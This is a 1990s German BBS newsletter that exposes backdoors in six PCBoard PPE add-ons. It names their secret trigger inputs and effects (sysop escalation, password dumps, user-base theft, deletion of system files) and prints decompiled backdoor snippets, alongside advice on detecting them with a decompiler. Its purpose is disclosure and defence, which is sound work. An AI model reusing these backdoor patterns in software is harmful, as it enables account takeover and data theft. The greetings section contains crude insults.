Ŀ 1000 YEARS OF UNDERGROUND EMPiRE WORLD DOMiNATiON sci.ue ROYAL BAVARiAN WAREZ-SUPPLiER SiNCE 1795 Ĵ P C B O A R D N E W S L E T T E R Ĵ written by: BAD PEON Ĵ Ĵ -1. VORWORT Ĵ Moin! Wir haben uns gedacht, wir bringen mal n paar Infos ber Backdoors in PPEs und ber die Zukunft von PC Board bzw. die des Herstellers Clark Development Company (CDC) selbst, damit ihr auch wisst, was Sache ist. Ĵ 0. INHALTSVERZEICHNIS Ĵ -1. VORWORT - Bla 0. INHALTSVERZEICHNIS - H?! 1. BACKDOORS IN PPES - Sechs konkrete Beispiele 2. WIE MAN SICH VOR BACKDOORS SCHTZT - Erkennen und vernichten! 3. EIN AUSBLICK IN DIE ZUKUNFT - PPLC 3.40 suckt! 4. WAS IST MIT CDC LOS? - Haste ma ne Mark? 5. DIES UND DAS UND IRGENDWAS - Greetings und Welteroberungsplne Ĵ 1. BACKDOORS IN PPES Ĵ Aja... diese Beispiele sind nicht alle 100% aktuell, aber die meisten Sysops werfen PPEs nicht einfach weg, bloss weil sie alt sind... es ist also gut mglich, dass der einer oder andere seit Monaten in seinem Board PPEs mit Backdoors laufen hat... :) TITEL : Intense Flag vO.8 GROUP : CIA - Creators of Insane Art ARCHIVNAME : CIAFLG08.ZIP PPE-FILENAME: IFLAG.PPE HERKUNFT : N/A FILE_ID.DIZ : .c!a. ܲ ܲ ܲܲ ߲ ܲ ۲ ܲ ܲ ߲޲ܲ XX߲ ߲ܲ ݰ ۲ ۲ ޲ ߲ ߲ ۲ ߲ ߰ ߲߲ ܲ ۲ ۲ . . [===(07/15/95)=============================] Intense Flag vO.8 by Dark Jester [PPE] For PCB 15.21+ ONLY! A NEW FLAG PPE more like the PiPELiNE interface! Aktivierung durch: Eingabe von "iA!" Effekt : Gibt dem User Sysop-Security. TITEL : Press Enter.PPE GROUP : DC - Dark Community ARCHIVNAME : DC-ENTER.ZIP PPE-FILENAME: ENTER.PPE HERKUNFT : Ultra lame, also wahrscheinlich von den Autoren selbst. FILE_ID.DIZ : +++DARK COMMUNITY+++ | PRESS ENTER.PPE | | IMPORTANT FOR ALL | | SYSOPS!!! | | READ DC.NFO FILE | | TO GET A PRESENT | |-------------------| | [05/03/97] | Aktivierung durch: Eingabe von "!" Effekt : Gibt die Namen und Passwrter der ersten zehn Benutzer des Sytems (also u.a. auch des Sysops) ans Modem aus, nicht aber an den lokalen Screen! TITEL : Menu Command GROUP : A.R Team ARCHIVNAME : N/A PPE-FILENAME: MPROMPT.PPE HERKUNFT : Anscheinend gerippt, mit Backdoor versehen und rereleaset. FILE_ID.DIZ : A GREAT NEW PPE FROM A.R TEAM MENU COMMAND! FADING, PALETTE CHANGING, DELAY CFG.. 100% CFG! GREAT NEW PPE !!! TAKE'T NOW! Aktivierung durch: Eingabe von "FFF1" Effekt : Gibt dem User Sysop-Security. TITEL : Energy Meter Logoff Prompt GROUP : Ako/Cpc ?? ARCHIVNAME : WAVLOGOF.ZIP PPE-FILENAME: WAVLOGOF.PPE HERKUNFT : Ultra lame, also wahrscheinlich von den Autoren selbst. FILE_ID.DIZ : ENERGY METER LOGOFF PROMPT ͻ PPE- To Replace the Cheesy PCB default "Proceed with logoff" prompt. This has LIGHT BAR and COOL ANIMATIONS (which is rare in PPEs) this is a MUST TRY!!!! PeeHS KcaLB [01/04/96] =AKo= ļ Aktivierung durch: Drcken von "*" nach dem Whlen von "USE RESERVES". Effekt : Gibt dem User Userlevel 110 (Standartvorgabe fr Sysoplevel). Das funktioniert nur, wenn es im PWRD- File diesen Userlevel auch gibt. TITEL : Protocol Select Replacement GROUP : Gilden ARCHIVNAME : N/A PPE-FILENAME: N/A HERKUNFT : Fake: einfach Version v2.0 mit nem Backdoor drin. FILE_ID.DIZ : -( PROTOCOL SELECT REPLACEMENT )Ļ Ŀ ͼ NiCE CURSOR iNTERFACE FULLY CONFiGURABLE (v2.1) MiNOR BUGFiX (PANDUR/GLD) ---(13/o1/96) Aktivierung durch: N/A Effekt : Gibt dem User Sysop-Security. TITEL : Oneliner v.1 GROUP : Independent: Black Night ARCHIVNAME : BK-ONEL.ZIP oder BK!ONEL.ZIP PPE-FILENAME: ONELINER.PPE HERKUNFT : Ein Fake, der NICHT von Black Night stammt. Entdeckt von The Mighty SCI!, Cyz und Co. FILE_ID.DIZ : LiNeR V.1 CODEDBYBLACKKNIGHT ܲ Ein echtes "Meisterwerk", ber das wir schon einmal berichtet haben (in UE-00074), aber mittlerweile haben wir genauere Infos darber. Diese PPE enthlt gleich mehrere Backdoors: 1. Aktivierung durch: Starten der PPE Effekt : Kopiert die Userbase und moved sie unter drei anderen Namen (THCHNO.ZIP, THBSHTBV.TXT, JANK.ZIP) ins Down- load-Verzeichnis der Main Board-Konferenz und trgt sie auch gleich in die Downloadliste ein. Zum downloaden muss man "flag [name]" tippen, weil die Files ja nicht in den Filelisten landen. 2. Aktivierung durch: Location des Users ist "bye bye". Effekt : Lscht folgende Files: c:\autoexec.bat c:\autoexec.bak c:\config.sys c:\config.sys Ein Bug :) c:\command.com c:\dos\command.com Die folgenden Files werden auch gleich aufgesprt und selbstverstndlich ebenfalls gekillt: USERS CNAMES DLPATHS.LST (der Main Board-Konferenz) PCBOARD.DAT Achja... da hier das DELETE-Kommando von PC Board be- nutzt wird, sollte es nicht weiter schwer sein, diese Files mittels einer Bootdiskette und UNDELETE wieder- herzustellen. bringens wird das DELETE-Kommando NICHT von PPLX 2.00 angekreidet! 3. Aktivierung durch: Location des Users ist "chicken man". Effekt : Gibt dem User Sysop-Security. 4. Aktivierung durch: In Zeile 32 von ONELINER.CFG steht "backdoor off". Effekt : Lscht die drei Kopien der Userbase wieder. So... wie wir gesehen haben, werden Backdoors fr gewhnlich durch Ein- gaben des Users aktiviert und dienen zum Erreichen der hchstmglichen Userlevels bzw. zum Zugriff auf fremde (bessere) Accounts. Ĵ 2. WIE MAN SICH VOR BACKDOORS SCHTZT Ĵ Man dekompiliert einfach die fragwrdige PPE mit PPLX 2.00 und achtet da- bei auf die "Decompiling Flags", die PPLX vergibt, wenn bestimmte ver- dchtige Funktionen in einer PPE vorkommen. Dann sieht man sich das er- zeugte PPX-File an und scrollt erst mal ganz an den Schluss, wo die Flags mit ihren Erklrungen stehen. Anschliesend sucht man (vom Anfang des Files an!) nach den Statements, die PPLX dort aufgefhrt hat. Sollte ein U_PWD bemngelt worden sein, sucht man danach; wenn davor ein 'GetUser' steht ist es (meistens) harmlos, da es nur das Password des derzeitigen Users enthlt. Steht davor allerdings ein 'GetAltUser', so liest die PPE das Passwort/die Passwrter anderer User. Ein Beispiel aus der WAVLOGOF.PPE: For INTEGER004 = 1 To 10 GetAltUser INTEGER004 MPrintLn MPrint "@POFF@" MPrintLn U_Name() MPrintLn U_Pwd MPrintLn Next For/Next sorgt dafr, dass alles, was dazwischen steht, mit jedem INTEGER004 von 1 bis 10 abgearbeitet wird. In diesem Fall werden also die Daten des Users Nummer 1-10 geladen, eine Leerzeile wird ans Modem ge- schickt (wir wollen ja schliesslich auch komfortable und ordentlich aus- sehende Backdoors!), dann wird das More?-Prompt deaktiviert (einmal htte auch gereicht, msste nicht in der Schleife stehen), dann wird der Name des Users ausgeben, dann sein Passwort und eine weitere Leerzeile spter geht das ganze mit dem nchsten User weiter. Ein User, der dieses Backdoor benutzt, sieht dann etwa folgendes: BAD PEON ASDFLKHSDMYVCOI THE MIGHTY SCI 7328984a7w876 OMEN LINUXRULES M0! SD.S}8ߊFS^-D%F!/&|%S(SD=,S'D54S$D#_*2`sJD;)?[@A (usw., hab hier keinen Bock 40 Zeilen fr ein Beispiel zu opfern) Ein PUTUSER bedeutet, dass die Userdaten des derzeitigen Users neu ge- schrieben werden, d.h. in der Regel verndert wurden. Hierbei sollte man nach einem U_SEC suchen, dass vor einem = steht, wie z.B. in dieser Zeilenfolge aus der WAVLOGOF.PPE: GetUser U_Sec = 110 PutUser GetUser liest die Userdaten, U_Sec = 110 setzt den Userlevel auf 110 und PutUser speichert dann die Userdaten. Ob der User in diesem Fall tat- schlich Sysop-Privilegien geniest hngt davon ab, ob der Sysop die vor- eingestellten Werte fr die Sysop-Funktionen hochgesetzt hat oder nicht, aber die meisten Sysops arbeiten einfach mit der Standart-Konfiguration von PC Board... selber schuld! Wenn es in dem Board gar keinen Userlevel 110 gibt, dann gibt PC Board nur eine Fehlermeldung aus und schreibt die Userdaten gar nicht erst in die Userbase. Bessere Backdoors sehen da eher so aus (IFLAG.PPE): GetUser U_Sec = ReadLine(PCBDat(), 16) PutUser Hier wird der neue Userlevel des Users auf den Wert gesetzt, der in der PCBOARD.DAT in der Zeile 16 vermerkt ist, und das ist genau der Wert, der zur "Users File Maintainance" erforderlich, also bei jedem halbwegs ver- nnftigen Sysop der hchste Userlevel berhaupt (damit kann man Userdaten aussphen und verndern). Daher wird diese PPE dem User in jedem Board den maximalen Userlevel geben, auch wenn der Sysop die Konfiguration kom- plett umgekrempelt hat. Gut nich? :) Ĵ 3. EIN AUSBLICK IN DIE ZUKUNFT Ĵ Mit PC Board 15.4 kommt, wie an den Beta-Versionen zu sehen war, mal wieder eine neue Version von PPLC, nmlich 3.40. Sie wird natrlich NICHT abwrtskompatibel sein, d.h.: ltere PC Boards knnen mit PPEs, die mit PPLC 3.40 kompeliert wurden, nichts anfangen, aber das war ja noch nie so. Zustzlich enthlt PPLC 3.40 neue Routinen zur Verschlsselung, die laut CDC das Dekompilieren fr immer unmglich machen werden. PPEs, die mit PPLC 3.40 kompeliert wurden, knnen mit KEINEM heute existenten Programm dekompiliert werden! Eine neue Flut von Backdoors rollt also auf uns zu, und wir haben keine Mglichkeit, etwas dagegen zu unternehmen. Lone Runner^AGS (PPLX) und Chicken^T4F (PPLD) haben damit mal wieder ein hartes Stck Arbeit vor sich... Aber keine Sorge Jungs, ewiger Weltruhm ist euch sicher! ;) Aber wenn man das ganze (ausnahmsweise) mal von einem objektiven Stand- punkt betrachtet, so stellt man fest: PPEs, die mit PPLC 3.40 kompiliert wurden... -sind maximal 0.1% kleiner im Vergleich zu PPLC 3.30, -bentigen lnger, um von PC Board entschlsselt zu werden, -erzielen wegen der Verschlsselung noch schlechtere Pack-Raten, -laufen nur auf PC Board 15.4, -sind IMMER verdchtig, Backdoors zu enthalten, -und sind daher ein absolut tdliches Risiko fr jeden Sysop! Daher wrde ich es als PPE-Coder nicht fr sehr sinnvoll halten, meine PPEs mit PPLC 3.40 zu kompelieren, weil sonst jeder Angst vor einem mglichen Backdoor hat und nichts unternehmen kann, um dieses Risiko zu minimieren. Deshalb werden bis auf weiters (also etwa bis PPLX/PPLD mit PPLC 3.40 um- gehen knnen) alle PPEs von Underground Empire nicht mit PPLC 3.40 kom- peliert! Wenn ihr eine Underground Empire-PPE findet, die mit PPLC 3.40 kom- peliert wurde, die neuer als die brigen Files im Archiv ist, deren Datum nicht mit dem im -UE-REL-.NFO bereinstimmt oder die sonstwie einen merk- wrdigen Eindruck macht, dann installiert es nicht sondern schickt es uns! Bis jetzt sind zwar noch keine gehackten Versionen von UE-PPEs auf- getaucht, aber einmal ist immer das erste mal. ;( Noch ein Wort zum Dekompilieren im allgemeinen: Ich benutze keine Decompiler-Traps, weil ich finde, dass jeder die Mg- lichkeit haben sollte, sich den Code einer PPE anzusehen, um herauszu- finden, was sie eigentlich so treibt. Ausserdem kann das Rekompilieren die einzige Mglichkeit sein, die PPE an sein Board anzupassen, falls die Configfiles nicht umfassend genug ausfallen sollten. Natrlich weiss ich, dass es genug Leute gibt, die sich den Code "einfach so" anschauen bzw. gerade selber eine hnliche PPE schreiben ;) Aber was spricht dagegen, sich anzusehen, wie andere Leute ein bestimmtes Problem gelst haben?? Das ganze hrt fr mich genau dann auf, wenn ganze Passagen einer dekompilierten PPE in eine neue, "eigene" PPE kopiert und nur noch die Namen der Variablen angepasst werden. Das ist dann nicht mehr Inspiration, sondern dumpfes Abschreiben! WARUM HAT CDC WAS GEGEN DECOMPILER? Guckt euch mal die Preisliste von CDC an :) Auch wenn sie ihre Preise er- heblich gesenkt haben, so bleibt PC Board ein Profi-Programm, an dem auch andere Firmen etwas verdienen wollen, indem sie z.B. Shareware-PPEs mit eingeschrnktem Funktionsumfang rausbringen, die dann sofort gecrackt werden. Ĵ 4. WAS IST MIT CDC LOS? Ĵ Wie wir inzwischen erfahren haben, ist die Firma CDC mittlerweile PLEITE und es sieht so aus, als wrden smtliche Angestellte arbeitslos und der gesamte Firmenbesitz verschachert werden. Allerdings versucht der harte Kern von CDC, Wege zu finden, um das Ge- schft nicht komplett aufgeben zu mssen, da sie mit PC Board Metaworlds ja ein zukunftstrchtiges Programm haben, dass nur deswegen kein Geld bringt, weil es noch nicht 100%ig ausgereift ist und weil CDC schlicht kein Geld hat, um Werbung dafr zu machen. PC Board selbst lsst sich im Zeitalter der Vlkerwanderung ins Internet ja kaum noch verkaufen, CDC hat das zu spt erkannt und daher haben sie jetzt Probleme, zu berleben. Wir werden trotzdem weiterhin PPEs entwickeln und die meisten Sysops werden auch nicht sofort ihre Boards wegschmeissen, nur weil es in der nchsten Zeit keine Updates mehr fr PC Board geben wird... viele Sysops benutzen ja z.B. immer noch PC Board 15.22, obwohl schon 2 neuere Ver- sionen da sind, nmlich 15.3 und 15.4beta. Ĵ 5. DIES UND DAS UND IRGENDWAS Ĵ Ich grsse: ACE ARUU, HANDO und THE EXORCIST, die einige Bugs im derzeit laufenden Beta-Test fr einige PPEs (u.a. UE!WHO v2.0) gefunden haben, THE MIGHTY SCI, der so nett ist, fr die Defizite eines ganz bestimmten Ex-UE-Mem- bers einzuspringen, ALLY605, der etwas glcklos ein PC Board mit allem, was man so braucht, laufen hat ohne dass es jemand bemerken wrde, JOSEF, dessen "Gilde Szene Beobachter" sich eigentlich nur um uns dreht, CYZ, der es immer noch nicht geschafft hat, mich wieder in sein Board zu las- sen, TIGER, der vor Objektivitt nur so strotzende UE-Kritiker von VDO, HEADBANGER, von dem ich endlich alle persnlichen Daten habe, FEAR FACTORY, die wohl bald die Charts erstrmen werden, VENOM, ohne die es keinen Trash, Death, Black oder sonstwas-Metal geben wrde, SLAYER, die hoffentlich wieder zu ihrer alten Klasse zurckfinden, DOC FRED, dessen Mrder freien Download in allen UE-Boards bekommt, MANIAC, dessen Board total vergammelt, ALLE USER DER WESTERN ALLIANCE, die jeden Upload fr eine persnliche Opferung halten, ALLE LAMER DER 09 AREA, die anscheinend aus allen anderen Areas rausgeschmissen wurden, MARIA UND JOSEF, deren Sohn ziemlich kaputt ist und sich fr JESUS hlt, SUICIDAL SNOWMAN UND WHITE TRASH, die sich pausenlos gegenseitig vergewaltigen und nebenbei noch die gesamte US-ANSI-Szene durch den Dreck ziehen, HGH, die uns immerhin auch mal gegreetet haben und eigentlich ganz ok waren, LORD XEEN, dessen PPEs bis heute unkopiert sind und dessen griechischer Dealer immer noch tot ist, DIR, dass du diesen Schmontz liest und ALLE SYSOPS, dass sie sich auch mal Sorgen um ihre Boardsoftware machen. :) Noch was: Wie allgemein zu Vernehmen ist, sind eine ganze Menge Sysops derzeit damit beschftigt, sehnschtig auf einen Nachfolger fr die Standart- PPE FLAG.PPE von PWA zu warten... nur noch wenige Monate! Aja genau: Greets an Xtreeman & Synopsis! ;) CYA... I AM BAD PEON! [EOF]